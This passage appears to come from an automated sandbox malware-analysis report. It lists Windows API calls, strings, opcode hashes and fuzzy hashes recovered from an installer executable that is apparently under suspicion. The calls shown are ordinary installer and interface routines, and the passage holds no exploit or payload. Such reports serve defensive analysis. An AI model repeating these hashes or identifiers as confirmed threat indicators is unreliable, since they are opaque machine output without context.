                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00405330
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00405340
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00405462
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 004054EA
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 004054F5
                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 004054FC
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                • String ID: $M$N
                                                                                                                                                                                                                                • API String ID: 2564846305-813528018
                                                                                                                                                                                                                                • Opcode ID: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                                                                                                                                                                                                • Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046F6
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0040470A
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
                                                                                                                                                                                                                                • GetSysColor.USER32(?), ref: 00404738
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 00404759
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 004047D4
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000), ref: 004047DB
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404806
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00404857
                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 0040485A
                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00404873
                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 00404876
                                                                                                                                                                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
                                                                                                                                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                                                                • String ID: Call$N$q
                                                                                                                                                                                                                                • API String ID: 3103080414-2770229300
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                                                • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                • String ID: F
                                                                                                                                                                                                                                • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 004049D9
                                                                                                                                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00404A03
                                                                                                                                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00404ABF
                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 00404AF1
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,Call), ref: 00404AFD
                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B0F
                                                                                                                                                                                                                                  • Part of subcall function 00405B81: GetDlgItemTextW.USER32(?,?,00000400,00404B46), ref: 00405B94
                                                                                                                                                                                                                                  • Part of subcall function 004067C4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76F73420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                                                                                                                                                                                                  • Part of subcall function 004067C4: CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                                                                                                                                                                                                  • Part of subcall function 004067C4: CharNextW.USER32(?,00000000,76F73420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                                                                                                                                                                                                  • Part of subcall function 004067C4: CharPrevW.USER32(?,?,76F73420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                                                                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 00404BD2
                                                                                                                                                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BED
                                                                                                                                                                                                                                  • Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                                                                                                                                                                                                                  • Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
                                                                                                                                                                                                                                  • Part of subcall function 00404D46: SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                • String ID: A$C:\Users\user\AppData\Local\Temp$Call$q
                                                                                                                                                                                                                                • API String ID: 2624150263-2010749303
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040631E,?,?), ref: 004061BE
                                                                                                                                                                                                                                • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061C7
                                                                                                                                                                                                                                  • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                                                                                                                                                                                                  • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                                                                                                                                                                                                • GetShortPathNameW.KERNEL32(?,00431108,00000400), ref: 004061E4
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00406202
                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 004062EB
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F2
                                                                                                                                                                                                                                  • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                                                                                                                                                                  • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                                                                • String ID: %ls=%ls$[Rename]
                                                                                                                                                                                                                                • API String ID: 2171350718-461813615
                                                                                                                                                                                                                                • Opcode ID: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                                                                                                                                                                                                • Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406695
                                                                                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,00000000,00000000,00425A20,76F723A0), ref: 004066A8
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,00000000), ref: 00406779
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                                                                                                                                                                                • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                • API String ID: 4260037668-2919979080
                                                                                                                                                                                                                                • Opcode ID: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                                                                                                                                                                                                                • Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 0040451D
                                                                                                                                                                                                                                • GetSysColor.USER32(00000000), ref: 0040455B
                                                                                                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00404567
                                                                                                                                                                                                                                • SetBkMode.GDI32(?,?), ref: 00404573
                                                                                                                                                                                                                                • GetSysColor.USER32(?), ref: 00404586
                                                                                                                                                                                                                                • SetBkColor.GDI32(?,?), ref: 00404596
                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004045B0
                                                                                                                                                                                                                                • CreateBrushIndirect.GDI32(?), ref: 004045BA
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2320649405-0
                                                                                                                                                                                                                                • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                                                                                                                                                • Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                                                                                                                                                                                  • Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124
                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                                                                                • String ID: 9
                                                                                                                                                                                                                                • API String ID: 163830602-2366072709
                                                                                                                                                                                                                                • Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                                                                                                                                                                                                • Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76F73420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                                                                                                                                                                                                • CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                                                                                                                                                                                                • CharNextW.USER32(?,00000000,76F73420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                                                                                                                                                                                                • CharPrevW.USER32(?,?,76F73420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Char$Next$Prev
                                                                                                                                                                                                                                • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                • API String ID: 589700163-2977677972
                                                                                                                                                                                                                                • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                                                                                                                                                                                • Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
                                                                                                                                                                                                                                • GetMessagePos.USER32 ref: 00404E77
                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00404E91
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                • String ID: f
                                                                                                                                                                                                                                • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                                                                                                                                • Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                                                                                                                                                                                                • MulDiv.KERNEL32(000982BC,00000064,00099830), ref: 00402FDC
                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 00402FEC
                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00402FFC
                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • verifying installer: %d%%, xrefs: 00402FE6
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                • Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                                                                                                                                                                                                • Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00402A06
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2667972263-0
                                                                                                                                                                                                                                • Opcode ID: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                                                                                                                                                                                                • Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00405AC5
                                                                                                                                                                                                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00405AE4
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94
                                                                                                                                                                                                                                Memory Dump Source
